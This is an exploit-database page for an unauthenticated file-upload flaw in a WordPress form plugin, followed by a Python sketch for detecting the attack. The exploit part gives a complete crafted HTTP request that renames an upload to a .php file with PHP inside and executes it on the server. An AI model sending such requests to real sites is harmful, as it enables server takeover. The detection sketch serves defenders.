## https://sploitus.com/exploit?id=WPEX-ID:DC34DC2D-D5A1-4E28-8507-33F659EAD647
1. Create a form with an upload input.
2. As an unauthenticated user, upload an image file and intercept the request.
3. Modify the request as follows:

```
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: testbox
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X_FILENAME: 3readme.php
X-FILENAME: 3readme.php
Content-Type: multipart/form-data; boundary=---------------------------231372247329806589063676810774
Content-Length: 1110
Origin: http://testbox
Connection: close
Referer: http://testbox/wordpress/index.php/2024/04/08/hello-world/
Cookie: wordpress_ba62313c33aedb7d46cae591be063de4=mirphak%7C17151795;wpforms_fields_group_settings_advanced=true; 45df-a0b7-fdcb263f17ee57190a; PHPSESSID=m0tplmmem0pm28kseu7iola5d7
 
-----------------------------231372247329806589063676810774
Content-Disposition: form-data; name="action"
 
arf_send_form_data
-----------------------------231372247329806589063676810774
Content-Disposition: form-data; name="frm"
 
100
-----------------------------231372247329806589063676810774
Content-Disposition: form-data; name="field_id"
 
gfeav2_58393
-----------------------------231372247329806589063676810774
Content-Disposition: form-data; name="file_type"
 
text/html
-----------------------------231372247329806589063676810774
Content-Disposition: form-data; name="types_arr"
 
htm|html, jpg|jpeg|php
-----------------------------231372247329806589063676810774
Content-Disposition: form-data; name="is_preview"
 
 
-----------------------------231372247329806589063676810774
Content-Disposition: form-data; name="files"; filename="readme.html"
Content-Type: text/html
 
<?phP  phpinfo(); ?>
 
-----------------------------231372247329806589063676810774
Content-Disposition: form-data; name="token"
 
72JcFplqUK
-----------------------------231372247329806589063676810774--
```

Access the uploaded file (`3readme.php` in the example above) and observe that the PHP executes.
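For defenders, the request above has three markers that can be checked at a proxy or in captured traffic: an `X-FILENAME` header naming an executable extension, a client-supplied `types_arr` that lists such an extension, and a header filename whose extension differs from the multipart `filename`. The following detection sketch is an added example, not part of the original advisory or the plugin's code; the function names, the `EXEC_EXT` list and the sample request are assumptions constructed for illustration.

```python
import re

# Extensions treated as server-executable (assumed list for this example).
EXEC_EXT = {"php", "php3", "php4", "php5", "php7", "phtml", "phar"}

def ext(name):
    return name.rsplit(".", 1)[-1].strip().lower() if "." in name else ""

def parse(raw):
    """Split a raw HTTP request into headers, form fields and part filenames."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    headers, fields, filenames = {}, {}, []
    for line in head.split("\n")[1:]:
        key, _, value = line.partition(":")
        headers[key.strip().lower().replace("_", "-")] = value.strip()  # X_FILENAME -> x-filename
    m = re.search(r"boundary=(\S+)", headers.get("content-type", ""))
    for part in body.split("--" + m.group(1)) if m else []:
        phead, _, pbody = part.strip("\n").partition("\n\n")
        name = re.search(r'\bname="([^"]*)"', phead)
        fname = re.search(r'\bfilename="([^"]*)"', phead)
        if fname:
            filenames.append(fname.group(1))
        elif name:
            fields[name.group(1)] = pbody.strip()
    return headers, fields, filenames

def findings(raw):
    """Return the reasons a request resembles the upload shown above."""
    headers, fields, filenames = parse(raw)
    hdr_name = headers.get("x-filename", "")
    allowed = {e.strip().lower() for e in re.split(r"[|,]", fields.get("types_arr", ""))}
    checks = [
        (ext(hdr_name) in EXEC_EXT, "X-FILENAME header names an executable extension"),
        (bool(allowed & EXEC_EXT), "client-supplied types_arr allows an executable extension"),
        (bool(hdr_name) and any(ext(f) != ext(hdr_name) for f in filenames),
         "X-FILENAME extension differs from multipart filename"),
    ]
    return [msg for hit, msg in checks if hit]

# Constructed sample modelled on the request above (file content replaced).
B = "----b1"
SAMPLE = "\n".join([
    "POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1", "Host: testbox",
    "X-FILENAME: 3readme.php", f"Content-Type: multipart/form-data; boundary={B}", "",
    f"--{B}", 'Content-Disposition: form-data; name="action"', "", "arf_send_form_data",
    f"--{B}", 'Content-Disposition: form-data; name="types_arr"', "", "htm|html, jpg|jpeg|php",
    f"--{B}", 'Content-Disposition: form-data; name="files"; filename="readme.html"',
    "Content-Type: text/html", "", "placeholder", f"--{B}--"])

if __name__ == "__main__":
    print("\n".join(findings(SAMPLE)))
```

Any one of the three findings on an unauthenticated POST to `admin-ajax.php` with `action=arf_send_form_data` is worth alerting on; a server-side fix would ignore both client-supplied values and validate against its own allow-list.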